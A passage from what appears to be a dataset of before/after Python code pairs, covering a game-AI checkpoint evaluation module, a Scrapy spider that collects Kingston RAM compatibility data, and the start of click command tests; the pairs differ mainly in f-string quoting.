if game.is_one_player_game():
game.add_eval_player(player)
first_hand.append(game)
else:
opponent = create_player(
seed_generator=seed_generator,
game=game,
player="mcts",
num_actor=num_actor_opponent,
num_rollouts=num_rollouts_opponent,
pure_mcts=pure_mcts_opponent,
actor_channel=actor_channel_opponent,
model_manager=None,
human_mode=False,
sample_before_step_idx=8,
randomized_rollouts=False,
sampling_mcts=False,
)
game_id = num_evaluated_games + game_no
if player_moves_first(game_id, num_game):
game.add_eval_player(player)
game.add_eval_player(opponent)
first_hand.append(game)
else:
game.add_eval_player(opponent)
game.add_eval_player(player)
second_hand.append(game)
context.push_env_thread(game)
games.append(game)
def get_eval_reward():
nonlocal first_hand, second_hand
reward = []
for hand in first_hand:
reward.append(hand.get_result()[0])
for hand in second_hand:
reward.append(hand.get_result()[1])
return reward
return context, actor_channel_eval, actor_channel_opponent, get_eval_reward
def player_moves_first(game_id, num_games_eval):
return game_id < num_games_eval // 2
#######################################################################################
# EVALUATION
#######################################################################################
def _forward_pass_on_device(
device: torch.device, model: torch.jit.ScriptModule, batch_s: torch.Tensor
) -> Dict[str, torch.Tensor]:
batch_s = utils.to_device(batch_s, device)
with torch.no_grad():
reply = model(batch_s)
return reply
def _play_game_neural_mcts_against_pure_mcts_opponent(
context: tube.Context,
actor_channel_eval: tube.DataChannel,
devices_eval: List[torch.device],
models_eval: List[torch.jit.ScriptModule],
) -> None:
nb_devices_eval = len(devices_eval)
context.start()
dcm = DataChannelManager([actor_channel_eval])
while not context.terminated():
batch = dcm.get_input(max_timeout_s=1)
if len(batch) == 0:
continue
assert len(batch) == 1 # only one channel
# split in as many part as there are devices
batches_eval_s = torch.chunk(
batch[actor_channel_eval.name]["s"], nb_devices_eval, dim=0
)
futures = []
reply_eval = {"v": None, "pi_logit": None}
# multithread
with ThreadPoolExecutor(max_workers=nb_devices_eval) as executor:
for device, model, batch_s in zip(
devices_eval, models_eval, batches_eval_s
):
futures.append(
executor.submit(_forward_pass_on_device, device, model, batch_s)
)
results = [future.result() for future in futures]
reply_eval["v"] = torch.cat([result["v"] for result in results], dim=0)
reply_eval["pi_logit"] = torch.cat([result["pi_logit"] for result in results], dim=0)
dcm.set_reply(actor_channel_eval.name, reply_eval)
dcm.terminate()
def _play_game_neural_mcts_against_neural_mcts_opponent(
context: tube.Context,
actor_channel_eval: tube.DataChannel,
actor_channel_opponent: tube.DataChannel,
devices_eval: List[torch.device],
models_eval: List[torch.jit.ScriptModule],
devices_opponent: List[torch.device],
models_opponent: List[torch.jit.ScriptModule],
) -> None:
nb_devices_eval = len(devices_eval)
nb_devices_opponent = len(devices_opponent)
context.start()
dcm = DataChannelManager([actor_channel_eval, actor_channel_opponent])
while not context.terminated():
batch = dcm.get_input(max_timeout_s=1)
if len(batch) == 0:
continue
assert len(batch) <= 2 # up to two channels
if actor_channel_eval.name in batch:
# split in as many part as there are devices
batches_eval_s = torch.chunk(
batch[actor_channel_eval.name]["s"], nb_devices_eval, dim=0
)
futures = []
reply_eval = {"v": None, "pi_logit": None}
# multithread
with ThreadPoolExecutor(max_workers=nb_devices_eval) as executor:
for device, model, batch_s in zip(
devices_eval, models_eval, batches_eval_s
):
futures.append(
executor.submit(_forward_pass_on_device, device, model, batch_s)
)
results = [future.result() for future in futures]
reply_eval["v"] = torch.cat([result["v"] for result in results], dim=0)
reply_eval["pi_logit"] = torch.cat(
[result["pi_logit"] for result in results], dim=0
)
dcm.set_reply(actor_channel_eval.name, reply_eval)
if actor_channel_opponent.name in batch:
# split in as many part as there are devices
batches_opponent_s = torch.chunk(
batch[actor_channel_opponent.name]["s"], nb_devices_opponent, dim=0
)
futures = []
reply_opponent = {"v": None, "pi_logit": None}
# multithread
with ThreadPoolExecutor(max_workers=nb_devices_opponent) as executor:
for device, model, batch_s in zip(
devices_opponent, models_opponent, batches_opponent_s
):
futures.append(
executor.submit(_forward_pass_on_device, device, model, batch_s)
)
results = [future.result() for future in futures]
reply_opponent["v"] = torch.cat(
[result["v"] for result in results], dim=0
)
reply_opponent["pi_logit"] = torch.cat(
[result["pi_logit"] for result in results], dim=0
)
dcm.set_reply(actor_channel_opponent.name, reply_opponent)
dcm.terminate()
def evaluate_on_checkpoint(
game_params: GameParams,
eval_params: EvalParams,
context: tube.Context,
actor_channel_eval: Optional[tube.DataChannel],
actor_channel_opponent: Optional[tube.DataChannel],
get_eval_reward: Callable[[], List[int]],
devices_eval: Optional[List[torch.device]],
models_eval: Optional[List[torch.jit.ScriptModule]],
pure_mcts_eval: bool,
devices_opponent: Optional[List[torch.device]],
models_opponent: Optional[List[torch.jit.ScriptModule]],
pure_mcts_opponent: bool,
) -> utils.Result:
if eval_params.eval_verbosity:
print(f"Playing {eval_params.num_game_eval} games of {game_params.game_name}:")
print(
f"- {"pure MCTS" if pure_mcts_eval else type(models_eval[0]).__name__} "
f"player uses "
f"{eval_params.num_rollouts_eval} rollouts per actor "
f"with {eval_params.num_actor_eval} "
f"actor{"s" if eval_params.num_actor_eval > 1 else ""}"
)
print(
f"- {"pure MCTS" if pure_mcts_opponent else type(models_opponent[0]).__name__} "
f"opponent uses "
f"{eval_params.num_rollouts_opponent} rollouts per actor "
f"with {eval_params.num_actor_opponent} "
f"actor{"s" if eval_params.num_actor_opponent > 1 else ""}"
)
if pure_mcts_eval:
pass # not implemented
else:
if pure_mcts_opponent:
_play_game_neural_mcts_against_pure_mcts_opponent(
context=context,
actor_channel_eval=actor_channel_eval,
devices_eval=devices_eval,
models_eval=models_eval,
)
else:
_play_game_neural_mcts_against_neural_mcts_opponent(
context=context,
actor_channel_eval=actor_channel_eval,
actor_channel_opponent=actor_channel_opponent,
devices_eval=devices_eval,
models_eval=models_eval,
devices_opponent=devices_opponent,
models_opponent=models_opponent,
)
result = utils.Result(get_eval_reward())
if eval_params.eval_verbosity >= 2:
print("@@@eval: %s" % result.log())
return result
#######################################################################################
# OVERALL EVALUATION WORKFLOW
#######################################################################################
def run_evaluation(eval_params: EvalParams, execution_params: ExecutionParams, only_last: bool = False) -> None:
start_time = time.time()
logger_dir = eval_params.checkpoint_dir
if eval_params.checkpoint_dir is None:
logger_dir = os.path.dirname(eval_params.checkpoint)
logger_path = os.path.join(logger_dir, "eval.log")
sys.stdout = utils.Logger(logger_path)
print("#" * 70)
print("#" + "EVALUATION".center(68) + "#")
print("#" * 70)
# evaluation is done on a NN-powered MCTS
pure_mcts_eval = False
print("setting-up pseudo-random generator...")
seed_generator = utils.generate_random_seeds(seed=eval_params.seed_eval)
if eval_params.plot_enabled:
print("creating plotter...")
plotter = create_plotter(eval_params=eval_params)
print("finding checkpoints...")
checkpoint_iter = create_checkpoint_iter(
eval_params=eval_params, only_last=only_last
)
models_opponent = []
pure_mcts_opponent = True
devices_opponent = None
game_params_opponent = None
if eval_params.checkpoint_opponent is not None:
print("creating opponent model(s) and device(s)...")
pure_mcts_opponent = False
(
models_opponent,
devices_opponent,
game_params_opponent,
) = create_models_and_devices_opponent(eval_params=eval_params)
results = []
first_checkpoint = False
game_params = None
for checkpoint in checkpoint_iter:
epoch = checkpoint.get("epoch", 0) # 0 when checkpoint_dir is None
model_state_dict_eval = checkpoint["model_state_dict"]
model_params_eval = checkpoint["model_params"]
if game_params is None:
game_params = checkpoint["game_params"]
sanitize_game_params(game_params)
# check that game_params are consistent between the model_eval and
# the model_opponent
if game_params_opponent is not None and game_params != game_params_opponent:
raise ValueError(
"The game parameters between the model to be tested"
"and the opponent model are different"
)
# check that game_params are consistent from one epoch to the other
checkpoint_game_params = checkpoint["game_params"]
sanitize_game_params(checkpoint_game_params)
if game_params != checkpoint_game_params:
raise ValueError(f"The game parameters have changed at checkpoint #{epoch}")
if not first_checkpoint:
print("creating model(s) and device(s)...")
devices_eval = [
torch.device(device_eval) for device_eval in eval_params.device_eval
]
models_eval = []
for device_eval in devices_eval:
models_eval.append(
create_model(
game_params=game_params,
model_params=model_params_eval,
resume_training=False,
).to(device_eval)
)
first_checkpoint = True
print("updating model(s)...")
for model_eval in models_eval:
model_eval.load_state_dict(model_state_dict_eval)
model_eval.eval()
num_evaluated_games = 0
rewards = []
eval_batch_size = eval_params.num_parallel_games_eval if eval_params.num_parallel_games_eval else eval_params.num_game_eval
print("evaluating {} games with batches of size {}".format(eval_params.num_game_eval, eval_batch_size))
while num_evaluated_games < eval_params.num_game_eval:
if eval_params.eval_verbosity:
print("creating evaluation environment...")
current_batch_size = min(eval_batch_size, eval_params.num_game_eval - num_evaluated_games)
(
context,
actor_channel_eval,
actor_channel_opponent,
get_eval_reward,
) = create_evaluation_environment(
seed_generator=seed_generator,
game_params=game_params,
eval_params=eval_params,
current_batch_size=current_batch_size,
pure_mcts_eval=pure_mcts_eval,
pure_mcts_opponent=pure_mcts_opponent,
num_evaluated_games=num_evaluated_games,
)
if eval_params.eval_verbosity:
print("evaluating...")
partial_result = evaluate_on_checkpoint(
game_params=game_params,
eval_params=eval_params,
context=context,
actor_channel_eval=actor_channel_eval,
actor_channel_opponent=actor_channel_opponent,
get_eval_reward=get_eval_reward,
devices_eval=devices_eval,
models_eval=models_eval,
pure_mcts_eval=pure_mcts_eval,
devices_opponent=devices_opponent,
models_opponent=models_opponent,
pure_mcts_opponent=pure_mcts_opponent,
)
num_evaluated_games += current_batch_size
rewards += partial_result.reward
elapsed_time = time.time() - start_time
print(f"Evaluated on {num_evaluated_games} games in : {elapsed_time} s")
result = utils.Result(rewards)
print("@@@eval: %s" % result.log())
results.append((epoch, result))
if eval_params.plot_enabled:
print("plotting...")
plotter.plot_results(results)
plotter.save()
elapsed_time = time.time() - start_time
print(f"total time: {elapsed_time} s")
| # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import sys
import time
from concurrent.futures import ThreadPoolExecutor
from typing import Iterator, Tuple, List, Callable, Optional, Dict
import torch
import tube
from pytube.data_channel_manager import DataChannelManager
from .params import GameParams, EvalParams, ExecutionParams
from . import utils
from .env_creation_helpers import (
sanitize_game_params,
create_model,
create_game,
create_player,
)
#######################################################################################
# PLOTTER CREATION
#######################################################################################
def create_plotter(eval_params: EvalParams) -> utils.Plotter:
checkpoint_dir = eval_params.checkpoint_dir
if checkpoint_dir[-1] == "/":
checkpoint_dir = checkpoint_dir[:-1]
plot_env = os.path.basename(checkpoint_dir)
return utils.Plotter(
plot_enabled=eval_params.plot_enabled,
env=plot_env,
server=eval_params.plot_server,
port=eval_params.plot_port,
)
#######################################################################################
# CHECKPOINT ITERATOR CREATION
#######################################################################################
def create_checkpoint_iter(eval_params: EvalParams, only_last: bool = False):
if eval_params.checkpoint_dir is not None:
return utils.gen_checkpoints(
checkpoint_dir=eval_params.checkpoint_dir,
real_time=eval_params.real_time and not only_last,
only_last=only_last,
)
else:
return [utils.load_checkpoint(eval_params.checkpoint)]
#######################################################################################
# OPPONENT MODEL AND DEVICE CREATION
#######################################################################################
def create_models_and_devices_opponent(
eval_params: EvalParams
) -> Tuple[List[torch.jit.ScriptModule], List[torch.device], GameParams]:
devices_opponent = [
torch.device(device_opponent) for device_opponent in eval_params.device_opponent
]
checkpoint_opponent = utils.load_checkpoint(eval_params.checkpoint_opponent)
model_state_dict_opponent = checkpoint_opponent["model_state_dict"]
game_params_opponent = checkpoint_opponent["game_params"]
sanitize_game_params(game_params_opponent)
model_params_opponent = checkpoint_opponent["model_params"]
models_opponent = []
for device_opponent in devices_opponent:
model_opponent = create_model(
game_params=game_params_opponent,
model_params=model_params_opponent,
resume_training=False,
).to(device_opponent)
remove = []
for k, v in model_state_dict_opponent.items():
if "training" in k:
remove.append(k)
for k in remove:
model_state_dict_opponent.pop(k)
model_opponent.load_state_dict(model_state_dict_opponent)
model_opponent.eval()
models_opponent.append(model_opponent)
return models_opponent, devices_opponent, game_params_opponent
#######################################################################################
# EVALUATION ENVIRONMENT CREATION
#######################################################################################
def create_evaluation_environment(
seed_generator: Iterator[int],
game_params: GameParams,
eval_params: EvalParams,
current_batch_size: int = None,
pure_mcts_eval: bool = False,
pure_mcts_opponent: bool = True,
num_evaluated_games: int = 0
) -> Tuple[
tube.Context,
Optional[tube.DataChannel],
Optional[tube.DataChannel],
Callable[[], List[int]],
]:
num_game = eval_params.num_game_eval
num_actor_eval = eval_params.num_actor_eval
num_rollouts_eval = eval_params.num_rollouts_eval
num_actor_opponent = eval_params.num_actor_opponent
num_rollouts_opponent = eval_params.num_rollouts_opponent
first_hand = []
second_hand = []
games = []
context = tube.Context()
actor_channel_eval = (
None
if pure_mcts_eval
else tube.DataChannel("act_eval", num_game * num_actor_eval, 1)
)
actor_channel_opponent = (
None
if pure_mcts_opponent
else tube.DataChannel("act_opponent", num_game * num_actor_opponent, 1)
)
for game_no in range(current_batch_size if current_batch_size else num_game):
game = create_game(
game_params, num_episode=1, seed=next(seed_generator), eval_mode=True
)
player = create_player(
seed_generator=seed_generator,
game=game,
player="mcts",
num_actor=num_actor_eval,
num_rollouts=num_rollouts_eval,
pure_mcts=pure_mcts_eval,
actor_channel=actor_channel_eval,
model_manager=None,
human_mode=False,
sample_before_step_idx=8,
randomized_rollouts=False,
sampling_mcts=False,
)
if game.is_one_player_game():
game.add_eval_player(player)
first_hand.append(game)
else:
opponent = create_player(
seed_generator=seed_generator,
game=game,
player="mcts",
num_actor=num_actor_opponent,
num_rollouts=num_rollouts_opponent,
pure_mcts=pure_mcts_opponent,
actor_channel=actor_channel_opponent,
model_manager=None,
human_mode=False,
sample_before_step_idx=8,
randomized_rollouts=False,
sampling_mcts=False,
)
game_id = num_evaluated_games + game_no
if player_moves_first(game_id, num_game):
game.add_eval_player(player)
game.add_eval_player(opponent)
first_hand.append(game)
else:
game.add_eval_player(opponent)
game.add_eval_player(player)
second_hand.append(game)
context.push_env_thread(game)
games.append(game)
def get_eval_reward():
nonlocal first_hand, second_hand
reward = []
for hand in first_hand:
reward.append(hand.get_result()[0])
for hand in second_hand:
reward.append(hand.get_result()[1])
return reward
return context, actor_channel_eval, actor_channel_opponent, get_eval_reward
def player_moves_first(game_id, num_games_eval):
return game_id < num_games_eval // 2
#######################################################################################
# EVALUATION
#######################################################################################
def _forward_pass_on_device(
device: torch.device, model: torch.jit.ScriptModule, batch_s: torch.Tensor
) -> Dict[str, torch.Tensor]:
batch_s = utils.to_device(batch_s, device)
with torch.no_grad():
reply = model(batch_s)
return reply
def _play_game_neural_mcts_against_pure_mcts_opponent(
context: tube.Context,
actor_channel_eval: tube.DataChannel,
devices_eval: List[torch.device],
models_eval: List[torch.jit.ScriptModule],
) -> None:
nb_devices_eval = len(devices_eval)
context.start()
dcm = DataChannelManager([actor_channel_eval])
while not context.terminated():
batch = dcm.get_input(max_timeout_s=1)
if len(batch) == 0:
continue
assert len(batch) == 1 # only one channel
# split in as many part as there are devices
batches_eval_s = torch.chunk(
batch[actor_channel_eval.name]["s"], nb_devices_eval, dim=0
)
futures = []
reply_eval = {"v": None, "pi_logit": None}
# multithread
with ThreadPoolExecutor(max_workers=nb_devices_eval) as executor:
for device, model, batch_s in zip(
devices_eval, models_eval, batches_eval_s
):
futures.append(
executor.submit(_forward_pass_on_device, device, model, batch_s)
)
results = [future.result() for future in futures]
reply_eval["v"] = torch.cat([result["v"] for result in results], dim=0)
reply_eval["pi_logit"] = torch.cat([result["pi_logit"] for result in results], dim=0)
dcm.set_reply(actor_channel_eval.name, reply_eval)
dcm.terminate()
def _play_game_neural_mcts_against_neural_mcts_opponent(
context: tube.Context,
actor_channel_eval: tube.DataChannel,
actor_channel_opponent: tube.DataChannel,
devices_eval: List[torch.device],
models_eval: List[torch.jit.ScriptModule],
devices_opponent: List[torch.device],
models_opponent: List[torch.jit.ScriptModule],
) -> None:
nb_devices_eval = len(devices_eval)
nb_devices_opponent = len(devices_opponent)
context.start()
dcm = DataChannelManager([actor_channel_eval, actor_channel_opponent])
while not context.terminated():
batch = dcm.get_input(max_timeout_s=1)
if len(batch) == 0:
continue
assert len(batch) <= 2 # up to two channels
if actor_channel_eval.name in batch:
# split in as many part as there are devices
batches_eval_s = torch.chunk(
batch[actor_channel_eval.name]["s"], nb_devices_eval, dim=0
)
futures = []
reply_eval = {"v": None, "pi_logit": None}
# multithread
with ThreadPoolExecutor(max_workers=nb_devices_eval) as executor:
for device, model, batch_s in zip(
devices_eval, models_eval, batches_eval_s
):
futures.append(
executor.submit(_forward_pass_on_device, device, model, batch_s)
)
results = [future.result() for future in futures]
reply_eval["v"] = torch.cat([result["v"] for result in results], dim=0)
reply_eval["pi_logit"] = torch.cat(
[result["pi_logit"] for result in results], dim=0
)
dcm.set_reply(actor_channel_eval.name, reply_eval)
if actor_channel_opponent.name in batch:
# split in as many part as there are devices
batches_opponent_s = torch.chunk(
batch[actor_channel_opponent.name]["s"], nb_devices_opponent, dim=0
)
futures = []
reply_opponent = {"v": None, "pi_logit": None}
# multithread
with ThreadPoolExecutor(max_workers=nb_devices_opponent) as executor:
for device, model, batch_s in zip(
devices_opponent, models_opponent, batches_opponent_s
):
futures.append(
executor.submit(_forward_pass_on_device, device, model, batch_s)
)
results = [future.result() for future in futures]
reply_opponent["v"] = torch.cat(
[result["v"] for result in results], dim=0
)
reply_opponent["pi_logit"] = torch.cat(
[result["pi_logit"] for result in results], dim=0
)
dcm.set_reply(actor_channel_opponent.name, reply_opponent)
dcm.terminate()
def evaluate_on_checkpoint(
game_params: GameParams,
eval_params: EvalParams,
context: tube.Context,
actor_channel_eval: Optional[tube.DataChannel],
actor_channel_opponent: Optional[tube.DataChannel],
get_eval_reward: Callable[[], List[int]],
devices_eval: Optional[List[torch.device]],
models_eval: Optional[List[torch.jit.ScriptModule]],
pure_mcts_eval: bool,
devices_opponent: Optional[List[torch.device]],
models_opponent: Optional[List[torch.jit.ScriptModule]],
pure_mcts_opponent: bool,
) -> utils.Result:
if eval_params.eval_verbosity:
print(f"Playing {eval_params.num_game_eval} games of {game_params.game_name}:")
print(
f"- {'pure MCTS' if pure_mcts_eval else type(models_eval[0]).__name__} "
f"player uses "
f"{eval_params.num_rollouts_eval} rollouts per actor "
f"with {eval_params.num_actor_eval} "
f"actor{'s' if eval_params.num_actor_eval > 1 else ''}"
)
print(
f"- {'pure MCTS' if pure_mcts_opponent else type(models_opponent[0]).__name__} "
f"opponent uses "
f"{eval_params.num_rollouts_opponent} rollouts per actor "
f"with {eval_params.num_actor_opponent} "
f"actor{'s' if eval_params.num_actor_opponent > 1 else ''}"
)
if pure_mcts_eval:
pass # not implemented
else:
if pure_mcts_opponent:
_play_game_neural_mcts_against_pure_mcts_opponent(
context=context,
actor_channel_eval=actor_channel_eval,
devices_eval=devices_eval,
models_eval=models_eval,
)
else:
_play_game_neural_mcts_against_neural_mcts_opponent(
context=context,
actor_channel_eval=actor_channel_eval,
actor_channel_opponent=actor_channel_opponent,
devices_eval=devices_eval,
models_eval=models_eval,
devices_opponent=devices_opponent,
models_opponent=models_opponent,
)
result = utils.Result(get_eval_reward())
if eval_params.eval_verbosity >= 2:
print("@@@eval: %s" % result.log())
return result
#######################################################################################
# OVERALL EVALUATION WORKFLOW
#######################################################################################
def run_evaluation(eval_params: EvalParams, execution_params: ExecutionParams, only_last: bool = False) -> None:
start_time = time.time()
logger_dir = eval_params.checkpoint_dir
if eval_params.checkpoint_dir is None:
logger_dir = os.path.dirname(eval_params.checkpoint)
logger_path = os.path.join(logger_dir, "eval.log")
sys.stdout = utils.Logger(logger_path)
print("#" * 70)
print("#" + "EVALUATION".center(68) + "#")
print("#" * 70)
# evaluation is done on a NN-powered MCTS
pure_mcts_eval = False
print("setting-up pseudo-random generator...")
seed_generator = utils.generate_random_seeds(seed=eval_params.seed_eval)
if eval_params.plot_enabled:
print("creating plotter...")
plotter = create_plotter(eval_params=eval_params)
print("finding checkpoints...")
checkpoint_iter = create_checkpoint_iter(
eval_params=eval_params, only_last=only_last
)
models_opponent = []
pure_mcts_opponent = True
devices_opponent = None
game_params_opponent = None
if eval_params.checkpoint_opponent is not None:
print("creating opponent model(s) and device(s)...")
pure_mcts_opponent = False
(
models_opponent,
devices_opponent,
game_params_opponent,
) = create_models_and_devices_opponent(eval_params=eval_params)
results = []
first_checkpoint = False
game_params = None
for checkpoint in checkpoint_iter:
epoch = checkpoint.get("epoch", 0) # 0 when checkpoint_dir is None
model_state_dict_eval = checkpoint["model_state_dict"]
model_params_eval = checkpoint["model_params"]
if game_params is None:
game_params = checkpoint["game_params"]
sanitize_game_params(game_params)
# check that game_params are consistent between the model_eval and
# the model_opponent
if game_params_opponent is not None and game_params != game_params_opponent:
raise ValueError(
"The game parameters between the model to be tested"
"and the opponent model are different"
)
# check that game_params are consistent from one epoch to the other
checkpoint_game_params = checkpoint["game_params"]
sanitize_game_params(checkpoint_game_params)
if game_params != checkpoint_game_params:
raise ValueError(f"The game parameters have changed at checkpoint #{epoch}")
if not first_checkpoint:
print("creating model(s) and device(s)...")
devices_eval = [
torch.device(device_eval) for device_eval in eval_params.device_eval
]
models_eval = []
for device_eval in devices_eval:
models_eval.append(
create_model(
game_params=game_params,
model_params=model_params_eval,
resume_training=False,
).to(device_eval)
)
first_checkpoint = True
print("updating model(s)...")
for model_eval in models_eval:
model_eval.load_state_dict(model_state_dict_eval)
model_eval.eval()
num_evaluated_games = 0
rewards = []
eval_batch_size = eval_params.num_parallel_games_eval if eval_params.num_parallel_games_eval else eval_params.num_game_eval
print("evaluating {} games with batches of size {}".format(eval_params.num_game_eval, eval_batch_size))
while num_evaluated_games < eval_params.num_game_eval:
if eval_params.eval_verbosity:
print("creating evaluation environment...")
current_batch_size = min(eval_batch_size, eval_params.num_game_eval - num_evaluated_games)
(
context,
actor_channel_eval,
actor_channel_opponent,
get_eval_reward,
) = create_evaluation_environment(
seed_generator=seed_generator,
game_params=game_params,
eval_params=eval_params,
current_batch_size=current_batch_size,
pure_mcts_eval=pure_mcts_eval,
pure_mcts_opponent=pure_mcts_opponent,
num_evaluated_games=num_evaluated_games,
)
if eval_params.eval_verbosity:
print("evaluating...")
partial_result = evaluate_on_checkpoint(
game_params=game_params,
eval_params=eval_params,
context=context,
actor_channel_eval=actor_channel_eval,
actor_channel_opponent=actor_channel_opponent,
get_eval_reward=get_eval_reward,
devices_eval=devices_eval,
models_eval=models_eval,
pure_mcts_eval=pure_mcts_eval,
devices_opponent=devices_opponent,
models_opponent=models_opponent,
pure_mcts_opponent=pure_mcts_opponent,
)
num_evaluated_games += current_batch_size
rewards += partial_result.reward
elapsed_time = time.time() - start_time
print(f"Evaluated on {num_evaluated_games} games in : {elapsed_time} s")
result = utils.Result(rewards)
print("@@@eval: %s" % result.log())
results.append((epoch, result))
if eval_params.plot_enabled:
print("plotting...")
plotter.plot_results(results)
plotter.save()
elapsed_time = time.time() - start_time
print(f"total time: {elapsed_time} s")
|
import json
import scrapy
from kingston.items import *
class ManufacturerSpider(scrapy.Spider):
"""
Get all compatible memory for all motherboards from certain manufacturer
"""
name = 'manufacturer'
allowed_domains = [
'kingston.com',
'www.kingston.com',
]
start_urls = [
'https://kingston.com/',
]
manufacturer = None
def __init__(self, manufacturer: str = ""):
if manufacturer == "":
manufacturer = None
if manufacturer is None:
raise ValueError("Invalid manufacturer given")
self.manufacturer = manufacturer
self.start_urls = ['https://www.kingston.com/en']
def parse(self, response: scrapy.http.Response):
"""
POST to get a list of manufacturer's motherboard models
"""
yield scrapy.FormRequest(
'https://www.kingston.com/en/memorysearch/ajax/getlines',
callback=self.POST_parse_models,
formdata={
'systemCategoryId': '7',
'manufacturerId': self.manufacturer,
'discontinued': 'false',
},
meta={
'manufacturerId': self.manufacturer,
},
)
def POST_parse_models(self, response: scrapy.http.Response):
"""
List models and meta information
"""
for model in json.loads(response.body):
yield scrapy.FormRequest(
'https://www.kingston.com/en/memorysearch/ajax/getmodels',
callback=self.POST_parse_model,
formdata={
'systemCategoryId': '7',
'manufacturerId': self.manufacturer,
'systemLine': model['Value'],
'discontinued': 'false',
},
meta={
'manufacturerId': self.manufacturer,
'systemLine': model['Value'],
},
)
def POST_parse_model(self, response: scrapy.http.Response):
"""
Get model's meta information
"""
data = json.loads(response.body)[0]
yield scrapy.Request(
f"https://www.kingston.com/en/memory/search?model={data["Value"]}&mfr={self.manufacturer}",
callback=self.parse_memory,
meta={
'manufacturerId': self.manufacturer,
'model': data['Value'],
'systemLine': response.meta['systemLine'],
},
)
def parse_memory(self, response: scrapy.http.Response):
"""
Get compatible memory modules for certain motherboard
"""
prodinfo = {}
for info in response.xpath("//div[@class='c-table__main_disable']/table/tr"):
k = info.xpath("./td[1]/text()").get().strip()
v = "".join(info.xpath("./td[2]//text()").getall()).strip()
prodinfo[k] = v
compatible_modules = Memory({
"_url": response.url,
"_manufacturer": response.meta['manufacturerId'],
"_model": response.meta['systemLine'],
"_product": prodinfo,
})
for section in response.xpath("//section[contains(@class, 'section-product_gallery')][@id]"):
# Iterate each section which lists compatible products such as memory, SSDs, etc..
# title is for example "ValueRAM Server Premier"
title = section.xpath(".//h2/text()").get().strip()
if "RAM" not in title:
# We're not interested in SSDs and such
continue
compatible_modules[title] = []
for memmodule in section.xpath("./ul[contains(@class, 'c-productGallery')]/li"):
# List each memory module
name = memmodule.xpath("./@data-pn").get()
moduleinfo = {
"_name": name,
}
for infoline in memmodule.xpath(".//div[@class='c-productCard__body__details']/ul/li"):
# List each memory module's specification line
txt = "".join(infoline.xpath(".//text()").getall()).strip()
if txt == 'PCN':
# Product change notify, ignore
continue
elif 'Spec Sheet PDF' in txt:
# PDF link
moduleinfo[txt] = infoline.xpath(".//a/@href").get()
else:
if ':' not in txt:
continue
# for example "Part Number: KVR24N17D8/16"
k, v = txt.split(": ", 1)
if 'Specs' in k:
# for example "DDR4, 2400MHz, Non-ECC, CL17, 1.2V, Unbuffered, DIMM"
v = v.split(", ")
moduleinfo[k] = v
compatible_modules[title].append(moduleinfo)
yield compatible_modules
| import json
import scrapy
from kingston.items import *
class ManufacturerSpider(scrapy.Spider):
"""
Get all compatible memory for all motherboards from certain manufacturer
"""
name = 'manufacturer'
allowed_domains = [
'kingston.com',
'www.kingston.com',
]
start_urls = [
'https://kingston.com/',
]
manufacturer = None
def __init__(self, manufacturer: str = ""):
if manufacturer == "":
manufacturer = None
if manufacturer is None:
raise ValueError("Invalid manufacturer given")
self.manufacturer = manufacturer
self.start_urls = ['https://www.kingston.com/en']
def parse(self, response: scrapy.http.Response):
"""
POST to get a list of manufacturer's motherboard models
"""
yield scrapy.FormRequest(
'https://www.kingston.com/en/memorysearch/ajax/getlines',
callback=self.POST_parse_models,
formdata={
'systemCategoryId': '7',
'manufacturerId': self.manufacturer,
'discontinued': 'false',
},
meta={
'manufacturerId': self.manufacturer,
},
)
def POST_parse_models(self, response: scrapy.http.Response):
"""
List models and meta information
"""
for model in json.loads(response.body):
yield scrapy.FormRequest(
'https://www.kingston.com/en/memorysearch/ajax/getmodels',
callback=self.POST_parse_model,
formdata={
'systemCategoryId': '7',
'manufacturerId': self.manufacturer,
'systemLine': model['Value'],
'discontinued': 'false',
},
meta={
'manufacturerId': self.manufacturer,
'systemLine': model['Value'],
},
)
def POST_parse_model(self, response: scrapy.http.Response):
"""
Get model's meta information
"""
data = json.loads(response.body)[0]
yield scrapy.Request(
f"https://www.kingston.com/en/memory/search?model={data['Value']}&mfr={self.manufacturer}",
callback=self.parse_memory,
meta={
'manufacturerId': self.manufacturer,
'model': data['Value'],
'systemLine': response.meta['systemLine'],
},
)
def parse_memory(self, response: scrapy.http.Response):
"""
Get compatible memory modules for certain motherboard
"""
prodinfo = {}
for info in response.xpath("//div[@class='c-table__main_disable']/table/tr"):
k = info.xpath("./td[1]/text()").get().strip()
v = "".join(info.xpath("./td[2]//text()").getall()).strip()
prodinfo[k] = v
compatible_modules = Memory({
"_url": response.url,
"_manufacturer": response.meta['manufacturerId'],
"_model": response.meta['systemLine'],
"_product": prodinfo,
})
for section in response.xpath("//section[contains(@class, 'section-product_gallery')][@id]"):
# Iterate each section which lists compatible products such as memory, SSDs, etc..
# title is for example "ValueRAM Server Premier"
title = section.xpath(".//h2/text()").get().strip()
if "RAM" not in title:
# We're not interested in SSDs and such
continue
compatible_modules[title] = []
for memmodule in section.xpath("./ul[contains(@class, 'c-productGallery')]/li"):
# List each memory module
name = memmodule.xpath("./@data-pn").get()
moduleinfo = {
"_name": name,
}
for infoline in memmodule.xpath(".//div[@class='c-productCard__body__details']/ul/li"):
# List each memory module's specification line
txt = "".join(infoline.xpath(".//text()").getall()).strip()
if txt == 'PCN':
# Product change notify, ignore
continue
elif 'Spec Sheet PDF' in txt:
# PDF link
moduleinfo[txt] = infoline.xpath(".//a/@href").get()
else:
if ':' not in txt:
continue
# for example "Part Number: KVR24N17D8/16"
k, v = txt.split(": ", 1)
if 'Specs' in k:
# for example "DDR4, 2400MHz, Non-ECC, CL17, 1.2V, Unbuffered, DIMM"
v = v.split(", ")
moduleinfo[k] = v
compatible_modules[title].append(moduleinfo)
yield compatible_modules
|
import re
import click
def test_other_command_invoke(runner):
@click.command()
@click.pass_context
def cli(ctx):
return ctx.invoke(other_cmd, arg=42)
@click.command()
@click.argument("arg", type=click.INT)
def other_cmd(arg):
click.echo(arg)
result = runner.invoke(cli, [])
assert not result.exception
assert result.output == "42\n"
def test_other_command_forward(runner):
cli = click.Group()
@cli.command()
@click.option("--count", default=1)
def test(count):
click.echo(f"Count: {count:d}")
@cli.command()
@click.option("--count", default=1)
@click.pass_context
def dist(ctx, count):
ctx.forward(test)
ctx.invoke(test, count=42)
result = runner.invoke(cli, ["dist"])
assert not result.exception
assert result.output == "Count: 1\nCount: 42\n"
def test_forwarded_params_consistency(runner):
cli = click.Group()
@cli.command()
@click.option("-a")
@click.pass_context
def first(ctx, **kwargs):
